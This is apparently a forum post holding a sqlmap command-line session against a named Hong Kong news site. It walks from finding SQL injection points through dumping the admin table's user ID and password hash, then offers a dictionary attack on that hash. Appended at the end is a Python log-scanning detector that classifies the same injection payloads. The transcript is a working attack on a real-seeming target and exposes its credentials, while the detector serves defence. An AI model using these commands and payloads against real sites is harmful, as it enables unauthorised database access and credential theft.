D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'

[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'

[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
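A defensive counterpart to the session above, added here as an example and not part of the original post: a small detector that parses web-server access-log lines, percent-decodes the query string, rewrites MySQL CHAR() sequences so sqlmap's ':cvx:' / ':ncv:' delimiters become readable, and labels each request with the technique (boolean, error-based, UNION, time-based) its payload matches. The log lines, client IP and timestamps are constructed; the payloads are the ones sqlmap reported in the transcript.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Signatures for the four techniques sqlmap reported above; specific ones first,
# the generic boolean "AND n=n" test last.
TECHNIQUES = [
    ("time-based blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("boolean-based blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
]
CHAR_CALL = re.compile(r"\bCHAR\s*\(([\d\s,]+)\)", re.I)
# Apache common/combined log prefix: client ident user [time] "METHOD URL PROTO" status
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def decode_char_calls(sql):
    """Rewrite MySQL CHAR(n,n,...) as the literal it builds: CHAR(58,99,118,120,58) -> ':cvx:'."""
    return CHAR_CALL.sub(lambda m: "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'", sql)

def classify(url):
    """Return (parameter, technique, decoded payload) for the first matching query parameter, else None."""
    for param, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:  # parse_qs has already percent-decoded the value once
            decoded = decode_char_calls(value)
            for technique, pattern in TECHNIQUES:
                if pattern.search(decoded):
                    return param, technique, decoded
    return None

def scan_log(lines):
    """Return (client ip, path, parameter, technique, decoded payload) for every flagged line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (found := classify(m.group("url"))):
            hits.append((m.group("ip"), urlsplit(m.group("url")).path) + found)
    return hits

# Constructed access-log lines (not real logs; client IP and timestamps are made up):
# the requests the four payloads listed in the transcript would generate, percent-encoded.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT%20(CASE%20WHEN%20(8404%3D8404)%20THEN%201%20ELSE%200%20END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 200 1342',
    '203.0.113.7 - - [01/Jan/2011:16:53:56 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65)%20AS%20CHAR),CHAR(32)),CHAR(58,110,99,118,58)),NULL,NULL,NULL%23 HTTP/1.1" 200 5200',
    '203.0.113.7 - - [01/Jan/2011:16:53:57 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The first sample line (a plain id=276 request) is not flagged; the other four are reported with the same labels sqlmap itself printed, and the decoded payload column shows the ':cvx:' / ':ncv:' markers that make the error-based and UNION probes easy to pick out in a log review.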